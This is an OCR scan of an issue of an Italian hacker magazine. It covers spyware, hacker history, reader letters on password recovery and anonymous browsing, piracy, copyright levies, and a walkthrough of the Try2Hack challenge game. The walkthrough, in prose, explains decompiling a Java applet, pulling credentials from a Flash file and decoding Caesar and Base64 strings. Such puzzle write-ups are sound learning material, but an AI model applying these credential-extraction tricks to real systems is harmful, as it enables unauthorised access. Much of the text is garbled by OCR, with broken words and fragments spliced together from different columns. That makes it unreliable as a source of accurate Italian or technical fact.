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ack'er (hàk'ar) 

"Persona che si diverte ad esplorare i dettagli dei sistemi di programmazione 
ome espandere le loro capacità, a differenza di molti utenti, che preferiscono 
sparare solamente il minimo necessario" 
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NON 



TUTTO GRATI Si 



Ormai sapete dove e come trovarci, appena 
possiamo rispondiamo a tu tti, anche a que lli 
incazzati. Parola di hacker. 

redazione@hackerjournal.it 



QUELLO CHE LUCCICA... 



Chi di voi accetterebbe in regalo un televisore che comunica al pr 
*ali canali e che tipo di videocassette vi piace guardare? E che magari aves- 
anche un microfono in grado di registrare tutto quello che dite in casa vo- 
ci? Ben pochi credo. 

Eppure qualcosa di simile accade con il software. A metà strada tra i pro- 
-ammi gratuiti e quelli a pagamento, si è insinuata negli ultimi anni una nuo- 
f categoria, quella dei programmi Adware, o Spyware. In cambio della licen- 
duso del programma, l'utente accetta di installare un'altro software, che ser- 
a tracciare le sue abitudini di navigazione per comunicarle a un network 
ibblicitario che ne farà tesoro, rivendendole ai suoi inserzionisti. Ad aggra- 
\re il panorama già di per sé inquietante, c'è // fatto che le comunicazioni tra 
software spione e la casa madre avvengono in modo cifrato, e non è possi- 
le sapere esattamente "che tipo" di dati vengono inviati. Bisogna fidarsi del- 
dichiarazioni del produttore (ne parliamo più in dettaglio nell'articolo di pa- 
na 18). 

Di chi è la colpa? Dei network pubblicitari senza scrupoli? Dei produttori di 

\areware ingordi? Del fatto che su Internet non si possono far valere le leggi 

?/ singoli stati (che in molti casi impedirebbero simili violazioni alla privacy?). 

canto a queste banali risposte, ne aggiungiamo una un po' fastidiosa: la col- 

i è anche nostra. 

Ci siamo abituati così tanto al "tutto gratis", che l'idea di pagare per ottene- 
' un prodotto o un servizio ormai ci suona strana, anormale, e qualsiasi stra- 
gemma per evitare di sborsare quattrini è buono. Anche la svendita della fio- 
ra privacy. Accanto a produttori di software che hanno visto negli Spyware 
l'allettante opportunità di guadagno in più, qualcuno ha dovuto ricorrere ad 
si per riuscire ad andare avanti, visto che -tra chi sceglieva freeware di gran- 
marche e chi semplicemente copia tutto il piratabile- non riuscivano più a 
*ndere nemmeno uno shareware da pochi dollari. Ma vale davvero così poco 
diritto alla privacy? 



grand@hackerjournal.it 



PS: a proposito di stratagemmi controproducenti, il sondaggio di pagina 7 
dimostra come, nel tentare di "fregare" una multinazionale troppo esosa, la pi- 
rateria abbia finito col regalarle un monopolio quasi assoluto. 
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mezzo secolo di uittorie. 



Il movimento 
hacker nac- 
que circa cin- 
quanta anni fa 
- quando, del tut- 
spontanea- 
mente, un gruppo 
di primi della classe, 
che avevano perso la testa per l'in- 
formatica, iniziò a curiosare per co- 
noscere, a studiare per sviluppare, a 
mettersi in discussione per progredi- 
re... senza chiedere nulla come corri- 
spettivo, senza inseguire la notorietà 
o il successo, ma per il solo gusto di 
farlo. 

Un approccio allo studio che cambiò 
il mondo, regalandoci, attraverso 
migliaia di scoperte ed invenzioni, 
grandi e piccole, l'informatica com'è 
oggi. Ma, soprattutto, insegnando, a 
chi ha orecchie per sentire e occhi 
per vedere, a chi non si lascia fuor- 
viare da false barriere sociali, eco- 
nomiche o culturali, un diverso modo 
di valutare la ricerca, la sperimenta- 
zione, il progresso e, in definitiva, le 
persone e la vita di tutti i giorni. 
Per un hacker non è importante es- 
sere nero o bianco, cattolico o musul- 
mano, ricco o povero; ciò che è im- 
portante è quello che ciascuno sa fa- 
re, trovare, inventare, trasmettere 
agli altri. E anche un fallimento può 
diventare, in quest'ottica, un mo- 
mento di crescita, un passo impor- 
tante ed apprezzabile, se denota vir- 
tuosismo, capacità, intelligenza, bra- 



"Lascia che il tuo cervello ti porti do- 
ve nessuno ha mai osato", questo 
potrebbe essere il motto degli hac- 
kers. 

Nonostante i mass-media dipingano 
quotidianamente l'underground in- 
formatico come luogo di perdizione, 
popolato di pervertiti, criminali, ter- 
roristi e feccia della peggior specie - 
dedicando (solitamente a sproposi- 
to) all'lnternet e all'hacking intere 
pagine di quotidiani, settimanali e 
periodici, ed intere puntate di note 
trasmissioni radiofoniche e televisi- 
ve, per soli fini di tiratura e di au- 
dience - la realtà è, per fortuna, ben 
diversa. 

L'attività dei gruppi di sedicenti hac- 
kers che, negli ultimi anni, ha prefe- 
rito scarabocchiare siti istituzionali e 
prelevare cartelle cliniche presiden- 
ziali, anziché sviluppare nuovi mo- 
delli di sicurezza informatica, diffon- 
dere notizie fuori dai canali conven- 
zionali o partecipare alle iniziative 
finalizzate a rendere la tecnologia e 
le informazioni realmente alla por- 
tata di tutti, ha indubbiamente reso 
più difficoltoso il percorso di una cul- 
tura che, ciò nonostante, inizia a dif- 
fondersi anche tra la gente normale. 
Per fortuna i lamers passano e gli 
hacker restano. Nel cuore della gen- 
te, degli appassionati come dei co- 
muni mortali, resta il ricordo di Steve 
Jobs e Steve Wozniak, che in un ga- 
rage diedero vita al primo personal 
computer; un ricordo che oggi rivive 
nel cuore di ogni possessore di un i- 



mac, redivivo simbolo di intelligenza 
votata all'indipendenza. O di Linus 
Torvalds, che, in epoca più recente 
ha regalato al mondo un sistema 
operativo capace di crescere solo 
grazie al supporto degli appassiona- 
ti, e di demolire realtà commerciali 
di livello mondiale. 
Ai nostri giorni c'è un'altra battaglia 
in corso, che vede Goldstein, storico 
Editor in Chief della rivista 2600, op- 
posto alle lobby statunitensi del ci- 
nema per la nota vicenda DECSS. 
Che vinca o perda, poco importa; il 
principio di indipendenza dalle ra- 
gioni commerciali, a beneficio della 
diffusione delle informazioni è ormai 
passato, ed inizia ad essere compre- 
so ed apprezzato anche dalla gente 
normale. E nulla potrà riportare in- 
dietro il tempo. Il Copyright, nell'era 
digitale, dovrà cambiare ed ade- 
guarsi. 

Ed anche questa sarà una vittoria 
degli hacker, che a modo loro, senza 
spari, senza bombe, senza violenza, 
hanno trasformato il mondo in soli 
cinquant'anni. Dimostrando che le 
rivoluzioni possono essere incruente, 
ma avere effetti ancora più impor- 
tanti. 

Com'era il titolo? Mezzo secolo di vit- 
torie. Chissà che tra cinquant'anni, 
qualcuno, rileggendo questa copia di 
HackerJournal, non sorrida pensan- 
do a quante altre ce ne sono state, 
levando il calice e celebrando cen- 
t'anni di vittorie degli hackers. 

Tuono Blu 



UN GIORNALE PER TUTTI: SIETE NEUJBIE UERI HRCKERS? 



v^Ji^m * * 



MIO HACKING 



HARD HACKING 



Il mondo Hack è fatto di alcune cose facili e tante cose difficili. Scrivere di Hac- 
king non è invece per nulla facile: ci sono curiosi, lettori alle prime armi (si fa 
per dire) e smanettoni per i quali il computer non ha segreti. Ogni articolo di 
Hacker Journal viene allora contrassegnato da un level: NEWBIE (per chi co- 
mincia), MIDHACKING (per chi c'è già dentro) e HARDHACKING (per chi man- 
gia pane e worm). 
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RECUPERO PASSWORD DI OFFICE 

Ciao, vi scrivo per chiedervi se è 
possibile recuperare delle pas- 
sword dei documenti word/excel e se 
è possibile quali programmi si pos- 
sono utilizzare? 

Marko 



Sì. Esistono. Prova a fare una ricerca 
su Google usando la stringa "office 
password recover" e troverai svariati 
programmi. Ovviamente il loro utiliz- 



zo e lecito 



HACKER RAZZISTI? 

Vi scrivo in merito a un dubbio sorto- 
mi durante la mia piccola carriera 
hacker... le possibilità di soluzione 
dell'argomento sono due: o sono 
scemo io, o le cose non sono chia- 
re... 

lo sono un newbie (me la cavo, mi ri- 
tengo abbastanza bravo), e sono ab- 
bastanza nuovo nel mondo hacking. 
Volevo che mi spiegaste un paio di 



-i sono moni nacKer ci 
^^^^^^^M Ok, sono 
d'accordo, anche io sono contro... 



o, di darmi un consiglio, o gli 
faccio vedere qualche mia creazione 



magari sbagliata mi dicono: 



Ora, questi sono contro il razzismo 
poi fanno una simile distinzione? Poi, 
esiste davvero? Se così fosse, ci sa- 
rebbe [H]iTLeR'45 che dominerebbe 
Hackerlandia, il paese dei veri hac- 
ker, e Ciampi che governerebbe Uo- 
mini-non-hacker-land. Non mi sem- 
bra tanto una cosa intelligente... 
Poi, scusate l'ignoranza... io sono un 
chatter, e non ho chiaro il motivo per 
cui un hacker (newbie, midhack o 
hardhack, chiunque) non può chatta- 
re. lo sono solo molto del mio tempo 
al pomeriggio, e nel tempo libero, se 
non faccio tutorial o cavoiate simili... 
beh ecco per smorzare la solitudine, 






ci vuole una chattata! Davvero, sono 
esterrefatto! Poi (già detto da altre 
persone) ci lamentiamo del luogo co- 
mune 

Hacker = Geek (Disadattato). 
In conclusione, significa che per es- 
sere hacker me lo de- 
vono dire i dottori, 
devo essere associa- 
le e diventare un 
computer dipenden- 
te??? Vorrei dei 
chiarimenti, e vorrei 
aggiungere, che non 
me la prendo con 
voi, ma con altri 
hacker che si dicono 
chissà cosa. Mi asso- 
cio completamente 
alla lettera di Gan- 
dalf86 dello scorso 
numero. 

Speranzoso di una 
risposta... 

Run3z 

Che ti devo dire... la 
nostra posizione la 
conosci: nessuno na- 
sce "imparato", e la linfa virale aena 
comunità hacker è sempre stata la li- 
bera circolazione delle informazioni. 



andare avanti con quello altrimenti il 
gioco non continuava ma rimanevo 
allo stesso punto. 

Esistono dei programmi che indivi- 
duano ed eliminano i bug? 

Dragon Hacker 



, A volte danno 
fastidio anche le persone che cerca- 
no soltanto una comoda via per rag- 
giungere uno scopo (spesso nemme- 
no tmnnn etimmRnte corretto), senza 
~nrsi di voler capi- 



re come funzionano i sistemi (anche 
sul nostro forum o nel canale #hac- 
kerjournal di Azzurra.org si trovano 
persone simili). In questo caso, non 
me la sento di condannare chi li 
snobba o li invita ad andare a scopa- 
re il mare. 

BACCHETTA MAGICA? 

Ho un problema: sono stato vittima 
per due volte di un bug sempre nello 
stesso videogioco e quindi ho dovuto 
caricare un salvataggio precedente e 





* 3 VVJr \ ■ 



Stai pur certo che se esistesse un pro- 
gramma simile, le software house lo 
pagherebbero a peso d'oro (ma 
quanto "pesa" un software?). Purtrop- 
po, a parte gli strumenti di debug- 
ging degli ambienti di sviluppo (che 
sicuramente le software house utiliz- 
zano, ma evidentemente no abba- 
stanza), non esistono simili "soluzioni 
magiche". 

NUOVI HACKER, VECCHIO STILE 

Ho letto l'articolo "I programmato- 
ri della vecchia guardia" di HJ 
n°7, e vorrei raccontare la mia storia. 
Ricordo ancora il giorno in cui mio 
padre mi diede il mitico Amstrad. 



Arrivò però il giorno in cui mi chiesi: 
"ma come cavolo funziona questo co- 
so"?. Quel giorno arrivò mio cugino, 
smontò pezzo per pezzo il vecchio 
Amstrad, mi spiegò da quali parti era 
formato e mi disse "ora rimontalo". 
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IL CORAGGIO D 



OSARE: INPIP END ENTI DA TUTT 



Ci misi un po' di tempo per rimontar- 
lo, ma alla fine ci riuscii. 
Col tempo ho cominciato ad appre- 
dere da solo i primi rudimenti di Ba- 
sic sul Commodore 64. Alle scuole 
medie conobbi Stefano, e il Pascal. 
Ormai ero una cosa sola con il PC, e 
finalmente mio cugino mi regalò il 
grande i486 DX-2, su cui installai 
Windows 95. lo e Stefano eravamo 
grandi amici, e ci legava e ci lega 
molto il PC. Alle medie imparai bene 
il Pascal, e alla fine dell'ultimo anno 
cominciai ad ambientarmi con Del- 
phi di Borland. 

Arrivati alle superiori, io e Stefano 
incontriamo Daniele, ancne lui ap- 
passionato di PC, e così decidemnic 



Avevamo tutti pezzi di PC buttati qua 
e la, memorie RAM, schede video, 
schede audio, schede madri per 
486... Il primo PC che abbiamo rico- 
struito (un Pentium 133) ci ha occu- 
pato un duro anno di lavoro, però ci 
siamo divertiti. 

Il nostro laboratorio, era una barac- 
ca scassata vicino casa mia, e d'in- 



ino il boot perchè erano conge 
Li dovevi far girare per 2 minuti, e 
dopo riavviare il PC. Solo allora ese- 



Mi sono capitati professori che non 
capivano una cippa, e io non potevo 
dire niente altrimenti mi segavano le 
gambe :). Il computer è una passione 
che ti nasce dentro, e c'è gente che 
crede di saperlo usare perchè ha il 
PC potente o perchè parla usando 



Ha 



Ecco i codici per accedere alla Secret Zone 
nostro sito, dove troverete informazioni 
** strumenti interessanti. Con alcuni browser, 
potrebbe capitare di dover inserire due vol- 
gli stessi codici. Non fermatevi al primo 




linguaggi super sofisticati. Tanta 
gente che parla a vanvera ma, quan- 
do è l'ora della verifica, si dilegua 
nel nulla. Ora ho 17 anni e spero 
che la passione che per il PC non mi 
abbadoni mai... 

Simone 

Lo speriamo anche noi, Simone. E Pi- 
dea di recuperare vecchi computer 



per rimetterli in sesto è senza dubbio 
una buona idea, che permette di im- 
parare molte cose. (Quella degli HD 
congelati comunque è la prima volta 
che la sentiamo!). Riguardo ai perso- 
naggi "tutte chiacchiere e scriptini 
già fatti", che vuoi fare/?! 




Attiva la tua casella 
iltuonome@hackerjournal.it 



opo aver lano aie sui nnK man rame me neiia man ai oenvenuro cne riceverai. 

* gratis" nella home page di www.hacker- Attenzione: come nome utente dovrai indicare il 

journal.it, e accettato le condizioni del con- tuo indirizzo email completo, compresa la parte 

atto, inserisci username e password che tro- ^u«#.l^kì**..k«#j :# 
>agina 7 della rivista. Questa password ser- 
>lo per l'attivazione, e non sarà necessari 
onsultare la tua casella. 



F«Nnm» Ihnfri» 







zzare le tue cartelle (dal link Folders), inse- 
isci ii tuo nome, un tuo cmuaie matrizzo ai rire gli indirizzi dei tuoi amici nella rubrica (da 
i elettronica e il nome utente che vuoi usare Address Book), e se vuoi puoi modificare la pas- 
e indirizzo. Occhio: l'indirizzo attuale deve sword predefinita e impostare altre opzioni (da 
re valido, perché la password e le istruzioni 
I collegamento verranno spedite lì. 








_*_ § • 



volta ricevuta la password nella vo 
- casella di posta, potrai collegarvi all'ini 
a Web della casella direttamente dalla h 
>age. Tutti i dati, compresi quelli per scaric 

posta con un client Pop3, sono indicati chi 



5 Mbyte di spazio a disposizione - 
Collegamento Web sicuro (SSL 128 
bit) - Possibilità di creare cartelle - 
Address Book - Signature - Modifica 
password - Preview del messaggio 
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Sul numero scorso vi abbiamo sfidato a individuare 
il vero nome di Tuono Blu, l'avvocato che rispond 

vostri dubbi e quesiti 



NAVIGAZIONE ANONIMA 

Carissimi amici di HJ, questa 
è una "tirata d'orecchie virtua- 
le"... vi scrivo per informarvi 
che il servizio di navigazione 
anonima che rendete disponi- 
bile nella vostra secret zone 
non funziona per niente (nes- 
suno dei 3 link). 
Sono sicuro che si tratta solo 
di un piccolo inconveniente e 
che presto provvederete al ri- 
pristino. 

Nel frattempo vi faccio i miei 
complimenti per la rivista che 
mi piace molto. 
Saluti... 

Skizzo 



A volte questi servizi hanno dei pro- 
blemi. Nel momento in cui ho provato 
io, Anonymizer funzionava tranquilla- 
mente, @nonimouse solo a tratti, 
mentre SafeWeb era giù. In alternati- 
va, prova ad andare a vedere 
http://anonymizer.autistici.org/anon 
ymizer-FAQ.php 

MESSAGGI SIBILLINI... 

Salve a tutti ho acquistato il n.6 dei- 



mi ha sempre incuriosito. 

Volevo porvi un domanda da profa- 



Anche quando rispondo all'indirizzo 
giusto, il 95% dell 



I kicker e 



cri nes 



E91 Br 



Hacking e infrazioni del- 
la legge. 

Siete stati velocissim 
poche ore dall'uscita in DIVENTARE HACKER 
edicola, in molti avete Salve sono Davide ho preso 
indovinato che si tratta- il n°6 della vostra rivista e 
va dell'Aw. Gianluca Po- penso di prendere anche il 
mante del Foro di Tera- n° 7 poiché he molto inte- 
mo, ressante, volevo chiedervi se 
Tutte e 5 le copie del ; 
libro "Hacker e compi 
crimes" che avevamo 
messo in palio sono sta- 
te assegnate quindi a Sinceramente, no. La nostra 



vostra rivista diventare veri 
Hacker. 



tempo record. 
I più veloci sono sì 
Marco B., aNgelo (Ares), 
Gianluca "ASTAL", Fulvio, 
Irene R. 



rivista non basta. È un po' 



come credere che si può 



rore, intuisco che c'è qualcosa di po- 
co corretto ma mi piacerebbe capire 



(quasi sempre x pubblicità ambigua) 
e come contrastare o controbattere. 

Gian 

Se si tratta di posta pubblicitaria in- 
desiderata (Spam), probabilmente il 
mittente ha indicato un indirizzo ine- 
sistente per evitare sanzioni da parte 
del suo provider. L'invio ci; simili mes- 
saggi è infatti quanto meno biasima- 
to, se non addirittura illegale in certi 
paesi; logico quindi che il mittente 
eventuali denunce 



.„m..«i......I3»«««..i««...mi 



o messaggi di er- 



_neanche se in- 
vitano a scrivere a un cer- 
to indirizzo per essere ri- 



mossi da una lista. 



"paranoia 



IBHSrKepasT 




Sul come difendersi 
dallo Spam, abbiamo 
pubblicato un articolo 
sul n. 4: puoi trovare 
l'arretrato nella secret 
I zone del nostro sito. 



| Cerfo, se ti in- 
teressa l'argomento, su Hacker Jour- 
nal troverai molti spunti di riflessione 
e stimoli per approfondire le tue co- 
noscenze. Ma devi avere l'atteggia- 
mento giusto e tanta voglia di fatica- 



VELOCITA DEL MODEM 

Sono da poco un lettore della vostra 
rivista, ma mi sto dando da fare con 
gli arretrati e cerco di imparare più 
in fretta che posso... Comunque vi 
scrivo per un problema che ho con i 
driver del mio modem: l'ho installato 
con i driver più adatti che c'erano sul 
ma 



1*1 |*M* Mi ff r r ■ * 



^comunque e un 
"mentor 56kbps USB modem exter- 
nal" installato con questi driver "Co- 
nexant HCF V90 Data Fax Voice USB 
Modem", il sistema operativo è 
win98SE, mi sapreste dire dove pos- 
so trovare dei driver + adatti? Ah 
premetto che tramite "gestione peri- 
feriche" ne ho già provate un sacco... 
vabbè in attesa di una vostra risposta 
attendo e vi auguro un buon lavoro. 
Grazie e ciaooo!! 

Bimbosenzavolto 

56 Kbps è la velocità massima rag- 
giungibile dal modem, ma questa è 



le telefonico che raggiunge la tua 
abitazione (in pratica, dalla bontà 
del colleaamento tra la centrale tele- 
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IL CORAGGIO 1 



OSARE 



ND I PENDlElNlTl 



TUTT 



fonica e casa tua, e 
tra la spina principa- 
le di casa al mo- 
dem). Sul primo trat- 
to, ovviamente non 
puoi intervenire, 
mentre per quanto\ 
riguarda il collega- 
mento dentro casa, 
dovresti cercare 



in condizioni ottimali 
si riescono a raggiunge- 
re i 56k, perché Telecom (come 
altre compagnie telefoniche), pone 
un limite inferiore alla velocità mas- 
sima. 

In ogni caso, 45333 è una velocità 
più che dignitosa: anche con colle- 
gamenti domestici fatti a regola d'ar- 
te, e in prossimità della centrale Te- 



Arretrati 

e abbonamenti 



ossibile 
arsi o richiedere i numeri arretrati 
ker Journal, che ormai stanno diventi 
aggetti da collezione. Stiamo cerca nd< 
stire le strutture necessarie, ma potr< 
jssere necessario un po' di tempo. Int< 
potete trovare i PDF di tutti i vecchi n 
i sul sito nella Secret Zone, e già che si 
jl sito, iscrivetevi alla nostra mailing li 
ite avvisati non appena i servizi abt 
lenti e arretrati saranno disponibili. 
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raggiungerai veloci- 
tà superiori. Non c'è 
niente che non vada 
nel tuo modem, quin- 
di. 

PROBLEMI CON 
LA POSTA 

Sono un Vs. aficiona- 
do, anzi un vero e 
proprio patito, ho 
provato ad 

accedere alla secret- 
zone x acchiapparmi 
, l'email di ©hacker- 
journal e 

mi è arrivato un war- 
ning sulla inattendi- 
bilità del certificato di 
protezione da parte del 
browser IE. Vi allego 
l'immagine del box 
che mi è apparso. Ve lo dico alla ro- 
mana: me devo fida? Oppure c'è 
qualke problema? 

Mick 



1 




« ■ J - ■ I ! ■ ' _l 



Internet Explorer gestisce i certificati 
un po' a modo suo, e ogni volta che 
c'è qualche problema, mostra dei 
messaggi quanto meno allarmanti. 
Non c'è problema ad accettare il cer- 
tificato del nostro sito. Qualcuno con 
IE addirittura non riesce a superare la 
pagina di login, e a caricare l'inter- 
faccia Web. In questo caso, bisogne- 
rebbe cancellare i vecchi certificati (li 
si trova in genere nel pannello Prote- 
zione delle Preferenze Internet, ma 
varia a seconda della versione...), 
avendo l'accortezza di conservare i 
certificati importanti (come quelli di 
accesso ai servizi di home banking). 
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Le motivazioni che uno trova per giustificare l'u- 
so di software pirata sono tante: "costa troppo... 
Uso solo il 5% delle sue funzioni... Sono costretto 
a usarlo per leggere i file doc, poc, toc, soc... In 
fin dei conti al produttore la pirateria sta bene, 
perché deve affermare uno standard... 
Ma se non fosse possibile fare copie pirata dei 
software costosi, come si comporterebbero le 
persone? 

La stragrande maggioranza di voi, se dovesse 
pagare per intero il prezzo di Office, si rivolge- 
rebbe a programmi alternativi (shareware o 
gratuiti, come Open Office). La domanda che, 
come dicono i cattivi giornalisti, "sorge sponta- 
nea" è: e allora perché non lo fate subito? Evite- 
reste di compiere azioni illegali (piratare il pro- 
gramma) e al contempo contribuireste a rende- 
re il mondo del software un po' più libero. 
L'altra domanda, un po' più ragionata, è la se- 
guente: se solo il 3,7% usasse Office (perché ne 
ha strettamente bisogno), Microsoft riuscirebbe 
davvero a convincere tutti gli altri ad acquistarlo 
solo per scrivere e fare di conto? Forse, in fondo 
in fondo, la pirateria le fa davvero comodo? 
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SOLUZIONI 



SFIDA ALL'ULTIMO 



Ui siete cimentati con il gioco Try2Hack e siete 
rimasti inchiodati a un lineilo? Non l'auete mai 
prouato, ma uolete imparare qualcosa sui sistemi 
di autenticazione, crittografia e tecniche di 
hacking? Ecco le soluzioni di tutti i lineili del gioco 




a qualche mese, dalle pagine del 
sito di Hacker Journal è possibile 
cimentarsi con il gioco Try2Hack, 
organizzato dall'olandese BuiZe 
in collaborazione con MediaMonks.nl (mal- 
grado qualcuno dica il contrario, il link al sito 
originale è sempre stato presente e ben visibi- 
le sul nostro sito). 

L'idea di base è semplice, e consiste nel cer- 
care di imparare le 



cose nel modo più divertente che ci 
sia: giocando. Se non si può fare a meno 
di passare qualche nottata a studiare, si può 
però trovare uno stimolo che renda il tutto 
più piacevole. Nella fattispecie, lo stimolo è 
costituito dal superare i vari livelli di 
Try2Hack, violando sistemi di autenti- 
cazione dal più banale al più sofisti- 
cato. Il tutto ha avuto un grande successo 
tra i nostri lettori, tanto che abbiamo deci- 



so di tenere una classifica dei più bra- 
vi (li trovate in ultima pagina). 

In tanti ci hanno richiesto la soluzione del gio- 
co, tanto che abbiamo deciso di pubblicarla, 
con una raccomandazione: la vera posta in 
gioco di Try2Hack è la conoscenza. Passare 
i vari livelli senza avere imparato nulla 
nel frattempo, è un po' come barare a 
un solitario. Completamente inutile e 
molto, molto triste. B 
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L'autenticazione di questo livello è basat 
Java. Per prima cosa, bisognerà procu 
un decompilatore per poter analizzare il 
gente dell'applet Java (un decompila 
piuttosto facile da usare si trova òu 
http://njcv.htmlplanet.com). Nel codice si 
nota il riferimento a un file, chiamato Ievel4. 
Leggendo il file, si trovano username, pas- 
sword e Uri del livello successivo. 



a un fili 
cne iauit;Miiw.u/.iwii^ y.~..~ - 

realizzato in Flash. Si può anche vedere il 

me e l'indirizzo del filmato in questione (FI 

Level2.swf). Aprendo il filmato con un e' 

di testo si possono individuare, in mezzo < 

ratteri dall'aspetto alieno, le parole txtUse 

me Try2Hack, txtPassword, NokialsG 
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iseriti nome utente e password, ci viene 
hiesto di collegarsi al canale #try2hac 
cquakenet.org, e di inviare al 
TRY2HACK una query Ci viene restituita 
stringa cifrata col Frasario di Cesar» 
Roti 3). Decifrandola, scopriamo che e 
biamo collegarci al canale #try2hack.le\ 
usando una password, anch'essa cifrate. __. 
"cifratura" altro non è che la codifica Base64. 
Decodificando la chiave si ottiene la pas- 
sword Level9-myBB3Dlux5L, da usare per 
accedere al canale. Una volta dentro a 
#try2hack.level9 ci verrà inviata una lunga 
stringa in codice binario, che una volta deco- 
dificato ci invita a inviare al bot try2hack il 
messaggio privato "showbug", che ci restitui- 
sce il sorgente di uno script scritto in linguag- 
gio Tel (comune nei bot Ire). Quello che biso- 
gna fare è risultare inseriti nella lista degli 
utenti del bot, e collegarsi per una chat Dee 
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Iron Bishop e LordBlack hanno 
pubblicato una guida al gioco 
Try2Hack molto più dettagliata 
di quella che potete trovare nel 
poco spazio che abbiamo a 
disposizione qui. Per ogni 
livello, vengono introdotte le 
tecniche e le conoscenze 
necessarie, vengono dati alcuni 
indizi e, se ancora brancolate 
nel buio, trovate le istruzioni 
dettagliate per superare il 
livello . 
La guida si trova su 

www.zonaitalia.it/test/tty2hack.html 

I due autori in realtà non 
risparmiano qualche critica alla 
nostra rivista e al nostro sito, 
anche su quella stessa pagina. 
Questo non ci impedisce di 
riconoscere il buon lavoro fatto 
con la guida, e di indicarvi il 
link. Come sempre, lasciamo ai 
nostri lettori il compito di 
farsi un'opinione, dopo aver 
sentito tutte le campane. 



Come nella migliore tradizione 
enigmistica, le soluzioni le 
pubblichiamo capovolte (anche se 
non a pagina 46...). Se proprio 
non potete resistere alla 
tentazione, eccovele: 
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O HP STRINGE IL 
GUINZAGLIO SU 
BRUCE PERENS 

Per dimostrare il suo impegno nel campo 
dell'operi source, tempo fa Hewlett-Pac- 
kard ha assunto Bruce Perens, uno dei "gu- 
ru" del sofware libero. Come molti altri lavo- 
ratori in tutto il mondo, Bruce ha subito 
pressioni dal suo datore di lavoro. 
Hewlett-Packard lo ha invitato a non fare 
una dimostrazione pubblica delle 
pratiche di rimozione delle prote- 
zioni regionali di un lettore DVD (noi abbia- 
mo spiegato come fare nel numero 6 di HJ). 
La dimostrazione avrebbe dovuto tenersi du- 
rante la Open Source Convention 2002 di 
San Diego. 

Effettivamente, Perens avrebbe potuto 
subire conseguenze rilevanti, in base alle 
nuove leggi americane sul copyright. m 



3 INTERCETTAZIONI? 
NO, THANKS! 

£a Commissione Nazionale per l'Informati- 
ca e la Libertà inglese ha appena conte- 
stato la legge sulla sorveglianza elettronica 
adottata nel 2000 dal governo inglese. La 
legge è in totale contraddizione 
con i diritti fondamentali dell'Uo- 
mo. La responsabile, Elizabeth France, ha 
dichiarato che gli attentati dell'1 1 settembre 
2001 hanno veramente cambiato l'equilibrio 
tra vita privata e sicurezza pubblica. El 



O UNA LIBRERIA FIN 
TROPPO APERTA 

earnes&Noble, il concorrente principale 
della libreria online Amazon negli Stati 
Uniti, si è appena comportata in modo asso- 
lutamente singolare e poco simpatico. Non 
si è degnata di rispondere alla 
messa all'erta di un esperto di si- 
curezza, che ha rilevato non meno di una 
mezza dozzina di falle nel sistema di sicurez- 
za del sito. Queste falle avrebbero potuto 
permettere di avere accesso a certe 
informazioni riservate sui suoi 
clienti. Neanche un grazie all'esperto che 
si sarebbe anche offerto di correggere i pro- 
blemi gratuitamente. Una condotta simile di 
certo non invoglia gli hacker a comportarsi 
in modo eticamente corretto. m 



O LA SIAE VUOLE IL "PIZZO" SUI CD-ROM 



□ 




Che ne pensaste se il Governo raddoppiasse i 
pedaggi autostradali per suddividere tra tutti i 
viaggiatori il costo delle multe per eccesso di ve- 
locità? se, pervia dei delitti impuniti, ciascun cit- 
tadino dovesse passare un mese in galera? Suona 
assurdo, no? Eppure qualcosa di molto simile 
sta per accadere nel campo del di- 
ritto d'autore. 
La situazione è questa; 
già ora, la Siae ..- 
guadagna un 
compenso su 
ogni sup- 
porto di j 
registra- i 
zione ver- ' 
gine ven- \ 
duto, a titolo 
di risarcimento 
per i mancati 
guadagni derivanti ^| 
dalle duplicazioni illegali 
che possono essere eseguite pro- 
prio con quel supporto. Il tutto già suona strano 
(far pagare una tassa a tutti come risarcimento dei 
danni derivanti dal comportamento di pochi), ma 
fino a questo momento è stato sopportabile per- 
ché questi compensi erano molto modesti. Se- 
condo il contenuto di una bozza di decreto legisla- 
tivo che dovrà essere prossimamente discusso al 
Consiglio dei Ministri, questi compensi do- 
vranno essere aumentati in modo 
spropositato, rendendoli talvolta persi- 
no superiori al costo fisico del suppor- 
to. Attualmente, si va dai 4 centesimi di euro per 
una cassetta audio (circa 77 delle vecchie lire) a i 
6 centesimi (100 lire circa) di un CD-R dati o di una 
videocassetta da 180 minuti. Secondo la bozza del 
D.Lgs questi importi diventeranno, rispettivamen- 
te, 60 e 84 centesimi per audio cassette e Cd-R, e 
addirittura 1,35 euro per una videocassetta. 




Questi importi saranno pagati anche da cui 
userà i CD-R per fare un backup dei 
propri dati, una cassetta audio per re- 
gistrare un'intervista (ormai si usano quasi 
solo per scopi diversi dalla duplicazione), o una 
video cassetta per registra- 
re la comunione del 
figlio. Il decreto legis- 
lativo dovrebbe re- 
cepire una diretti- 
va europea che 
invita gli stati a 
emanare leggi in 
questo senso, 
ma in Gran 
Bretagna, Ir- 
landa, Lussem- 
* burgo, Norvegia e 
: Portogallo queste 
tasse non esistono, e ne- 
gli altri Paesi gli importi sono molto, 
molto inferiori a quelli indicati dalla propo- 
sta di legge. L'unica speranza è che, prima dell'ap- 
provazione il testo venga drasticamente modifica- 
to, ma è molto flebile (tra l'altro, il Governo ha su 
questa materia una delega che gli permette di evi- 
tare la discussione della legge in Parlamento o nel- 
le Commissioni). 

A peggiorare la rabbia, c'è il più che legittimo so- 
spetto che i soldi raccolti in questo non 
saranno affatto ridistribuiti in modo 
uniforme tra tutti gli autori e gli editori, grandi e 
piccoli, ma finiranno nelle tasche dei po- 
chi potentissimi soggetti che già ora si ar- 
ricchiscono spartendosi, talvolta in modo poco 
trasparente, i soldi raccolti dalla Siae . Se volete 
conoscere i meccanismi che regolano il giro dei 
soldi in Siae, leggetevi la trascrizione dell'inchiesta 
della trasmissione Report, disponibile su www.re- 
port.rai.it/2liv.asp?s=82. Attenzione però: c'è da 
incazzarsi fino a farsi venire il fegato marcio, cj 



O PAGHERETE CARO, PAGHERETE TUTTO 

£jcco di quanto aumenteranno i prezzi dei supporti vergini e dei dispositivi di memorizzazione. I dati so- 
no stati ricavati dalla tabella pubblicata dall'Andec all'indirizzo www.andec.it/news/fr_news1 .htm. m 




Prodotto 
dallo 



Cassetta audio 
CD-R audio 74 min 
CD-R dati 650 Mb. 
Video cassetta an. 180 min 
DVD-R 180 min 
Videoregistratore analogico 
Masterizzatori CD dati 



Compenso attuale 



€0,04 (70 lire) 
€0,08 (155 lire) 
€0,05 (100 lire) 
€0,06 (120 lire) 
Nessun compenso 
Nessun compenso 
3% sul 20% del prezzo 




Compenso previsto 
schema di d. lgs 



€0,60 (1160 lire) 
€0,56 (1085 lire) 
